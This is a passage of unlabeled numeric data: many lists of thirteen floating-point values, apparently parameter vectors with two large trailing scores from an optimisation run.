3.940038642964773e-11, -7.181977887130175e-11, -1.1548751736666541e-15, 3.1745148598988346e-16, 2.707077658308786e-05, -1.92536072773705e-06, -1.6138736645669917e-08, 8.669699125562364e-10, 435950975348.6226, 363915964843.3034], [6.393923513974502e-06, -1.4269415936091027e-12, -1.7684911527276688e-13, 5.480211712359269e-11, -7.243742739542879e-11, -1.1795054510279537e-15, 3.8683254669914693e-16, 2.7200371659468664e-05, -1.925930700762681e-06, -1.643396668485197e-08, 8.601004856702239e-10, 840789439847.5613, 886246867017.2574], [6.5292806963971566e-06, -1.2521788644307235e-12, -1.752024719240228e-13, 5.432423395298522e-11, -7.243160061946103e-11, -1.1728842336075722e-15, 3.642469974043324e-16, 2.4721354631465055e-05, -1.9201275577069358e-06, -1.6042437181983083e-08, 8.613978338195112e-10, 1220087240914.9465, 1538404370735.8923], [7.222746286095911e-06, -1.4287928653696903e-12, -1.7798884315456173e-13, 5.47608522234827e-11, -7.177949793819456e-11, -1.1234835849356116e-15, 3.638627899273496e-16, 2.4725904181789833e-05, -1.7849753358990938e-06, -1.6004659818379623e-08, 9.095587982641099e-10, 1457214324700.6113, 3971854766728.4727]]\n\n[1.5780628845471506e-10, -1.411490597458207e-12, -2.483949940281473e-13, 5.026488748046414e-11, -1.6612576871621329e-10, -1.6989844545344268e-15, 8.109443782655016e-16, 2.404048022255995e-05, -1.9859378185800262e-06, -1.6176901999289427e-08, 9.489903548622118e-10, 102704594939.3429, 145011267381.10236]\n\n[6.525636151737385e-10, -1.5516831882387681e-12, -2.3065883936338436e-13, 4.6265959327559024e-11, -1.669670220497726e-10, -1.803564324024427e-15, 9.085513864943156e-16, 2.3963751617497686e-05, -1.9517021060346726e-06, -1.7031696163247858e-08, 9.514461873186105e-10, 165879895673.90985, 148817892429.6303]\n\n[6.525636151737385e-10, -1.5516831882387681e-12, -2.3065883936338436e-13, 4.6265959327559024e-11, -1.669670220497726e-10, -1.7924226413310876e-15, 9.085513864943156e-16, 2.3963751617497686e-05, -1.9517021060346726e-06, -1.68878771600575e-08, 9.514461873186105e-10, 117267023779.58536, 138194745977.8172]\n\n[6.483959591091273e-10, -1.5516831882387681e-12, -2.490649104258458e-13, 5.026488748046414e-11, -1.669670220497726e-10, -1.6989844545344268e-15, 8.109443782655016e-16, 2.3963751617497686e-05, -1.9859378185800262e-06, -1.6176901999289427e-08, 9.514461873186105e-10, 81279986793.6045, 148499957167.59894]\n\n[6.525636151737385e-10, -1.3197261044307544e-12, -2.4458923117817936e-13, 4.6265959327559024e-11, -1.6585443429963996e-10, -1.802849923078712e-15, 9.085513864943156e-16, 2.3963751617497686e-05, -1.9517021060346726e-06, -1.68878771600575e-08, 9.514461873186105e-10, 121168243931.69568, 138376625633.08905]\n\n[6.525636151737385e-10, -1.5516831882387681e-12, -2.3065883936338436e-13, 4.59768924730343e-11, -1.6588127033784183e-10, -1.7924226413310876e-15, 9.085513864943156e-16, 2.3963751617497686e-05, -1.9859378185800262e-06, -1.6176901999289427e-08, 9.503282761551985e-10, 127284942067.54468, 147143586736.12967]\n\n[6.525636151737385e-10, -1.5516831882387681e-12, -2.3065883936338436e-13, 4.6265959327559024e-11, -1.669670220497726e-10, -1.803564324024427e-15, 8.4683341745183045e-16, 2.3963751617497686e-05, -1.9517021060346726e-06, -1.7031696163247858e-08, 9.514461873186105e-10, 165879895673.90985, 148817892429.6303]\n\n[6.483959591091273e-10, -1.5516831882387681e-12, -2.477506624442777e-13, 5.026488748046414e-11, -1.669670220497726e-10, -1.7924226413310876e-15, 8.070333012129768e-16, 2.4138485475672502e-05, -1.9859378185800262e-06, -1.6108027319186075e-08, 9.514461873186105e-10, 78167992157.7952, 149819556305.94864]\n\n[2.8389500911155237e-10, -1.3179669217824132e-12, -2.1290409882195637e-13, 5.0376537605765665e-11, -1.7763084077799175e-10, -1.8081388431942655e-15, 8.940150894056582e-16, 2.501288034169883e-05, -2.04721003e-06, -1.5842532923181598e-08, 9.632771875757591e-10, 108694336300.90585, 154375559012.27695]\n\n[3.603083193105678e-11, -1.3197261044307544e-12, -2.213785963757499e-13, 4.581086934703742e-11, -1.6681614728164575e-10, -1.803564324024427e-15, 8.4683341745183045e-16, 2.4065016435368993e-05, -2.0711260096490455e-06, -1.7031696163247858e-08, 1.0052651438176042e-09, 98921398930.67514, 195080915978.15582]\n\n[-2.0926038768787875e-10, -1.4706748741606338e-12, -2.3988654320236774e-13, 4.877026722101481e-11, -1.4519789238682426e-10, -1.8284483886533772e-15, 8.688144408462996e-16, 2.7398930354457147e-05, -1.8015495121292713e-06, -1.818410294118833e-08, 8.90965422552221e-10, 100727388654.51337, 143318140783.98648]\n\n[-2.0926038768787875e-10, -1.4706748741606338e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.450370910345386e-10, -1.9257301298903336e-15, 8.688144408462996e-16, 2.7370809361932293e-05, -1.8015495121292713e-06, -1.818410294118833e-08, 8.935114691513575e-10, 112772825510.86789, 160453198244.84198]\n\n[-8.304227478096081e-10, -1.500986356346536e-12, -1.9531413192683389e-13, 4.764041880667976e-11, -1.8918518378579712e-10, -1.9257301298903336e-15, 8.688144408462996e-16, 2.7122228639393258e-05, -1.8099079507631247e-06, -1.8203397437532012e-08, 8.935114691513575e-10, 177535436392.6114, 109895891048.79645]\n\n[-2.0926038768787875e-10, -1.6406892521440393e-12, -1.9531413192683389e-13, 4.85603371945204e-11, -1.450370910345386e-10, -1.9257301298903336e-15, 8.688144408462996e-16, 2.7370809361932293e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 8.935114691513575e-10, 150364957402.63327, 122880053749.32047]\n\n[-8.223802918909379e-10, -1.4625176901480844e-12, -2.703868659848318e-13, 4.852404641399239e-11, -1.896863627503491e-10, -1.9257301298903336e-15, 8.688144408462996e-16, 2.697391208672331e-05, -1.7223534426462784e-06, -1.7212440323693525e-08, 8.377481199786938e-10, 199237170018.58218, 130994741061.18477]\n\n[-2.1118416643089627e-10, -1.459747004615292e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4471230416768517e-10, -1.9257301298903336e-15, 8.688144408462996e-16, 2.7267797101210102e-05, -1.8015495121292713e-06, -1.818410294118833e-08, 8.935114691513575e-10, 120611068648.22205, 148716985588.15564]\n\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9412676391052573e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.8210829282495652e-15, 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.081976758127089e-10, 190052435274.9098, 101545825010.15762]\n\n[-2.0926038768787875e-10, -1.647013760811586e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4446129047664535e-10, -1.8210829282495652e-15, 8.731899868495941e-16, 2.4857867004975476e-05, -1.8015495121292713e-06, -1.8287117187317536e-08, 9.081976758127089e-10, 195239394048.3779, 101879284463.33914]\n\n[-8.372413642600907e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.8210829282495652e-15, 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.8287117187317536e-08, 9.087619653117874e-10, 178582869424.88885, 102270797763.39908]\n\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.937673308636816e-13, 4.852404641399239e-11, -1.432701673757514e-10, -1.8210829282495652e-15, 8.765174154706532e-16, 2.4703687041471573e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.087619653117874e-10, 171732970643.1874, 106305215455.77405]\n\n[-8.304227478096081e-10, -1.500986356346536e-12, -1.9531413192683389e-13, 4.7704075824842225e-11, -1.8975666267494283e-10, -1.9099300746589145e-15, 8.757096667187756e-16, 2.7122228639393258e-05, -1.809239966469619e-06, -1.8203397437532012e-08, 8.935114691513575e-10, 166731944707.48343, 109962566902.69849]\n\n[-2.0926038768787875e-10, -1.3235354562894133e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.5027518840822802e-10, -1.9355556139972827e-15, 8.69779310515605e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.113315958572542e-10, 198705325524.15018, 111850971687.16727]\n\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.858844276736905e-11, -1.5027518840822802e-10, -1.9257301298903336e-15, 8.765174154706532e-16, 2.507247127369048e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.134614417430693e-10, 152877011534.3794, 128488226222.4665]\n\n[-8.325113652893972e-10, -1.647013760811586e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.8226533446456543e-15, 8.718221314640016e-16, 2.471871023322042e-05, -1.788813296914756e-06, -1.836034443165441e-08, 9.148927620445716e-10, 115664967416.85544, 172987399752.44284]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15, 8.763652695826297e-16, 2.4957985197946978e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.035879148460716e-10, 195862055252.448, 98829512345.71223]\n\n[-8.372802930516975e-10, -1.647013760811586e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.815921924023075e-15, 8.765346456450067e-16, 2.4957985197946978e-05, -1.799557982850986e-06, -1.836034443165441e-08, 9.081976758127089e-10, 191606485390.66824, 100937635343.36494]\n\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.869384519400452e-11, -1.432701673757514e-10, -1.8130493256774034e-15, 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.087619653117874e-10, 197397120635.11142, 101220474756.5564]\n\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.924272863609467e-13, 4.852404641399239e-11, -1.4730851235460287e-10, -1.8195538935082505e-15, 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.081976758127089e-10, 189380748451.24603, 101440046940.62292]\n\n[-2.0926038768787875e-10, -1.647013760811586e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4663924630161214e-10, -1.815921924023075e-15, 8.688144408462996e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.8287117187317536e-08, 9.081976758127089e-10, 179897941081.52283, 101479475091.5385]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.8210829282495652e-15, 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.081976758127089e-10, 186125019263.05353, 101522685052.87083]\n\n[-8.372413642600907e-10, -1.647013760811586e-12, -1.9531413192683389e-13, 4.826770959894538e-11, -1.4675478300173032e-10, -1.815921924023075e-15, 8.675713932751666e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.8287117187317536e-08, 9.087619653117874e-10, 176424094355.21158, 102059630396.96977]\n\n[-8.32774857282967e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.475667375214216e-10, -1.8210829282495652e-15, 8.765174154706532e-16, 2.4703687041471573e-05, -1.7921694947468313e-06, -1.836034443165441e-08, 9.080472327376693e-10, 190619161162.84558, 102134941196.42899]\n\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9412676391052573e-13, 4.835930442286039e-11, -1.4675478300173032e-10, -1.8210829282495652e-15, 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.8287117187317536e-08, 9.087619653117874e-10, 178582869424.89273, 102270797763.3992]\n\n[-8.372413642600907e-10, -1.3359785407261977e-12, -1.9482957217087468e-13, 4.831070029448083e-11, -1.4675478300173032e-10, -1.8210829282495652e-15, 8.688144408462996e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.8287117187317536e-08, 9.087619653117874e-10, 178582869424.89435, 102270797763.39929]\n\n[-2.0926038768787875e-10, -1.647013760811586e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4446129047664535e-10, -1.8304219886094965e-15, 8.765174154706532e-16, 2.4857867004975476e-05, -1.8015495121292713e-06, -1.8287117187317536e-08, 9.087619653117874e-10, 191644867011.30374, 102518032445.5969]\n\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9412676391052573e-13, 4.82400894161232e-11, -1.4446129047664535e-10, -1.8228595048374295e-15, 8.751158883884222e-16, 2.506841119647095e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.081976758127089e-10, 172947032775.99432, 102577021916.3392]\n\n[-2.103367158359051e-10, -1.3359785407261977e-12, -1.9376482536341035e-13, 4.852404641399239e-11, -1.432701673757514e-10, -1.8210829282495652e-15, 8.765174154706532e-16, 2.4703687041471573e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.087619653117874e-10, 171732970643.1874, 106305215455.77405]\n\n[-8.372413642600907e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.8210829282495652e-15, 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.8161784527844478e-08, 9.087619653117874e-10, 144963603428.97382, 112061347287.60056]\n\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9412676391052573e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.8210829282495652e-15, 8.765174154706532e-16, 2.5026084747023036e-05, -1.7900208911755532e-06, -1.830053261436748e-08, 9.087619653117874e-10, 125853468889.92097, 136457449593.06062]\n\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.937673308636816e-13, 4.852404641399239e-11, -1.432701673757514e-10, -1.8210829282495652e-15, 8.765174154706532e-16, 2.4703687041471573e-05, -1.776082515662521e-06, -1.836034443165441e-08, 9.087619653117874e-10, 126137991779.33096, 160562679389.67618]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15, 8.763652695826297e-16, 2.4957985197946978e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.035879148460716e-10, 195862055252.448, 98829512345.71223]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.803543054789903e-15, 8.763652695826297e-16, 2.4957985197946978e-05, -1.799557982850986e-06, -1.836034443165441e-08, 9.081976758127089e-10, 186222924740.70007, 100125948657.42978]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9475632661250835e-13, 4.855683396544643e-11, -1.4675478300173032e-10, -1.815921924023075e-15, 8.83613368865103e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.081976758127089e-10, 183895104728.34744, 101215117638.35565]\n\n[-2.0926038768787875e-10, -1.3382357152930057e-12, -1.9531413192683389e-13, 4.869384519400452e-11, -1.432701673757514e-10, -1.8130493256774034e-15, 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.087619653117874e-10, 197397120635.11142, 101220474756.5564]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.432701673757514e-10, -1.8130493256774034e-15, 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.087619653117874e-10, 197397120635.11664, 101220474756.55742]\n\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.924272863609467e-13, 4.852404641399239e-11, -1.476291648179518e-10, -1.8195538935082505e-15, 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.081976758127089e-10, 189380748451.4617, 101440046940.6675]\n\n[-2.0969974314689316e-10, -1.647013760811586e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4663924630161214e-10, -1.815921924023075e-15, 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.8287117187317536e-08, 9.081976758127089e-10, 179897941081.52283, 101479475091.5385]\n\n[-2.0926038768787875e-10, -1.647013760811586e-12, -1.9531413192683389e-13, 4.8730627003901226e-11, -1.4675478300173032e-10, -1.815921924023075e-15, 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.8287117187317536e-08, 9.081976758127089e-10, 179897941081.58997, 101479475091.5439]\n\n[-2.0926038768787875e-10, -1.6370065196284276e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4663924630161214e-10, -1.8210829282495652e-15, 8.725909439109588e-16, 2.5149586855224063e-05, -1.8040587516026417e-06, -1.830053261436748e-08, 9.081976758127089e-10, 174674218067.03134, 101707557509.25955]\n\n[-2.0780704759852712e-10, -1.3359785407261977e-12, -1.928247479392491e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.815921924023075e-15, 8.815489945689696e-16, 2.492800478197597e-05, -1.799557982850986e-06, -1.830053261436748e-08, 9.081976758127089e-10, 177564736843.2668, 101910116331.42278]\n\n[-2.0926038768787875e-10, -1.3481496678499343e-12, -1.9612804716494087e-13, 4.869384519400452e-11, -1.4625361988654996e-10, -1.816149350524488e-15, 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.087619653117874e-10, 176677319245.07892, 101942928295.47075]\n\n[-8.324503936172223e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4535167828811644e-10, -1.799249889019179e-15, 8.763652695826297e-16, 2.4957985197946978e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.063398319687734e-10, 161710635101.41095, 104790698646.6004]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.8168585276282465e-11, -1.4675478300173032e-10, -1.8210829282495652e-15, 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.102513898455556e-10, 160649925757.17908, 106424978687.80653]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.869384519400452e-11, -1.4675478300173032e-10, -1.799249889019179e-15, 8.765174154706532e-16, 2.4957985197946978e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.067222192179334e-10, 157509126624.7564, 106648081137.30634]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.924272863609467e-13, 4.87567764690249e-11, -1.473869541008466e-10, -1.8210829282495652e-15, 8.797810044472039e-16, 2.5128697145423343e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.089655956213592e-10, 156027014786.34595, 106784848298.00577]\n\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.8130493256774034e-15, 8.758120054489215e-16, 2.489589641570383e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.120599461707459e-10, 159857940983.01962, 106918161793.97298]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9347415380665696e-13, 4.85631967683728e-11, -1.4675478300173032e-10, -1.8210829282495652e-15, 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.836417410231251e-08, 9.134390375783151e-10, 142628527511.76648, 117274357359.96004]\n\n[-2.0926038768787875e-10, -1.647013760811586e-12, -1.9567576322418712e-13, 4.852404641399239e-11, -1.4663924630161214e-10, -1.815921924023075e-15, 8.688144408462996e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.8287117187317536e-08, 9.120365536291957e-10, 136801158565.52109, 118996909122.33968]\n\n[-2.0926038768787875e-10, -1.3468298773490566e-12, -1.924272863609467e-13, 4.852404641399239e-11, -1.4730851235460287e-10, -1.8210829282495652e-15, 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.13148553316506e-10, 131221998343.07083, 125656067768.88814]\n\n[-8.372802930516975e-10, -1.6610460978653825e-12, -1.9391155389121011e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15, 8.765346456450067e-16, 2.500200335107093e-05, -1.777109321965829e-06, -1.836034443165441e-08, 9.081976758127089e-10, 107442969837.9951, 191438895729.71088]\n\n[-8.373514643167848e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15, 8.705169785374419e-16, 2.4957985197946978e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.035879148460716e-10, 195862055252.448, 98829512345.71223]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4659424506650604e-10, -1.7864100157215748e-15, 8.706272486016714e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.087619653117874e-10, 185690352687.11697, 99223644222.007]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9475632661250835e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.803543054789903e-15, 8.839563844754409e-16, 2.4957985197946978e-05, -1.799557982850986e-06, -1.836034443165441e-08, 9.081976758127089e-10, 186222924740.70007, 100125948657.42978]\n\n[-8.29844666406642e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.849645416672899e-11, -1.4675478300173032e-10, -1.803543054789903e-15, 8.714032924475303e-16, 2.492800478197597e-05, -1.799557982850986e-06, -1.836034443165441e-08, 9.081976758127089e-10, 190148608462.3534, 100180028793.61896]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.869384519400452e-11, -1.432701673757514e-10, -1.8130493256774034e-15, 8.765174154706532e-16, 2.5177177276929545e-05, -1.7997194394724915e-06, -1.850709631603352e-08, 9.087619653117874e-10, 199924589208.46686, 100223589650.82378]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9654069739659012e-13, 4.855683396544643e-11, -1.461461940090847e-10, -1.803543054789903e-15, 8.763652695826297e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.081976758127089e-10, 178626169889.2221, 100558408593.70113]\n\n[-8.332310924150067e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.8877585360256924e-11, -1.4675478300173032e-10, -1.8130493256774034e-15, 8.763652695826297e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.087619653117874e-10, 193351738763.71564, 100949387586.23102]\n\n[-8.372802930516975e-10, -1.343853363763315e-12, -1.9192642832280474e-13, 4.852404641399239e-11, -1.446871529700577e-10, -1.8130493256774034e-15, 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.087619653117874e-10, 197397120636.1133, 101220474756.86967]\n\n[-2.081071620571536e-10, -1.3430194729908366e-12, -1.9531413192683389e-13, 4.8687777307168814e-11, -1.432701673757514e-10, -1.8195538935082505e-15, 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.081976758127089e-10, 189380748448.52612, 101440046940.05927]\n\n[-8.372802930516975e-10, -1.3382357152930057e-12, -1.9531413192683389e-13, 4.869384519400452e-11, -1.432701673757514e-10, -1.815921924023075e-15, 8.834544584685654e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.087619653117874e-10, 198690577754.9655, 101467426817.57397]\n\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.924272863609467e-13, 4.8327983670281894e-11, -1.4675478300173032e-10, -1.8258864221284576e-15, 8.83613368865103e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.8304452912365864e-08, 9.081976758127089e-10, 193392923341.53983, 101900620617.14302]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9719420123154376e-13, 4.861133464689211e-11, -1.483232636118454e-10, -1.8195538935082505e-15, 8.765174154706532e-16, 2.492800478197597e-05, -1.7966453439138136e-06, -1.836034443165441e-08, 9.087619653117874e-10, 174954502194.04602, 103131734300.077]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.814072294943091e-11, -1.437983579446461e-10, -1.8130493256774034e-15, 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.107645094765291e-10, 171249412831.2997, 103180541968.40872]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.476291648179518e-10, -1.7906363569860738e-15, 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.8221372696029056e-08, 9.081976758127089e-10, 154981149327.29538, 103805616436.34537]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.855683396544643e-11, -1.432701673757514e-10, -1.825643030416898e-15, 8.83613368865103e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.81828896229741e-08, 9.081976758127089e-10, 158250536108.31226, 106843736334.12831]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9439448414369486e-13, 4.855683396544643e-11, -1.4675478300173032e-10, -1.8130493256774034e-15, 8.765174154706532e-16, 2.5187119035976227e-05, -1.797858272312416e-06, -1.836034443165441e-08, 9.087619653117874e-10, 148433419780.93826, 110030788135.34956]\n\n[-8.372802930516975e-10, -1.3382357152930057e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.432701673757514e-10, -1.799249889019179e-15, 8.765174154706532e-16, 2.4802576523291093e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.087619653117874e-10, 152744383578.88885, 111006224451.55664]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9475632661250835e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.815921924023075e-15, 8.83613368865103e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.8140174569754755e-08, 9.081976758127089e-10, 140660582328.68314, 113087422800.04585]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.815921924023075e-15, 8.763652695826297e-16, 2.4957985197946978e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.081976758127089e-10, 148227079557.4723, 115101067854.69138]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15, 8.763652695826297e-16, 2.4957985197946978e-05, -1.7900208911755532e-06, -1.830053261436748e-08, 9.081976758127089e-10, 129686832886.01216, 126984206927.84627]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.869384519400452e-11, -1.4592095499147362e-10, -1.7864100157215748e-15, 8.706272486016714e-16, 2.5177177276929545e-05, -1.7997194394724915e-06, -1.850709631603352e-08, 9.087619653117874e-10, 188127979624.47858, 98138013390.26245]\n\n[-8.373514643167848e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.8139505305916955e-11, -1.4675478300173032e-10, -1.799249889019179e-15, 8.783887938075847e-16, 2.4957985197946978e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.035879148460716e-10, 195862055252.45816, 98829512345.71414]\n\n[-8.379785124926609e-10, -1.3292316984383345e-12, -1.955394873972143e-13, 4.852404641399239e-11, -1.4779126633130978e-10, -1.799249889019179e-15, 8.775397316555329e-16, 2.5049204386853816e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.035879148460716e-10, 183972070969.05157, 98891303611.42876]\n\n[-8.373750609204521e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.869384519400452e-11, -1.4659424506650604e-10, -1.7864100157215748e-15, 8.706272486016714e-16, 2.492800478197597e-05, -1.7997194394724915e-06, -1.836034443165441e-08, 9.087619653117874e-10, 176341783374.723, 99638222233.03885]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4696825367906723e-10, -1.799249889019179e-15, 8.705169785374419e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.087619653117874e-10, 187303786818.71506, 99962477826.90034]\n\n[-8.29844666406642e-10, -1.3259182588069894e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.803543054789903e-15, 8.839563844754409e-16, 2.492800478197597e-05, -1.799557982850986e-06, -1.836034443165441e-08, 9.081976758127089e-10, 190148608462.3526, 100180028793.6191]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9475632661250835e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.803543054789903e-15, 8.839563844754409e-16, 2.4907384876305387e-05, -1.799557982850986e-06, -1.836034443165441e-08, 9.081976758127089e-10, 192885903228.52237, 100290100926.3771]\n\n[-8.372802930516975e-10, -1.340114474894997e-12, -1.9475632661250835e-13, 4.852404641399239e-11, -1.4659424506650604e-10, -1.803543054789903e-15, 8.839563844754409e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.087619653117874e-10, 193159834117.98853, 100447140164.3877]\n\n[-8.45347775440883e-10, -1.3359785407261977e-12, -1.9409478257397567e-13, 4.852404641399239e-11, -1.463585775827913e-10, -1.812045689500589e-15, 8.706272486016714e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.087619653117874e-10, 192907161589.0385, 100872818268.9527]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.8130493256774034e-15, 8.705169785374419e-16, 2.4957985197946978e-05, -1.7997194394724915e-06, -1.836034443165441e-08, 9.087619653117874e-10, 183710210581.81177, 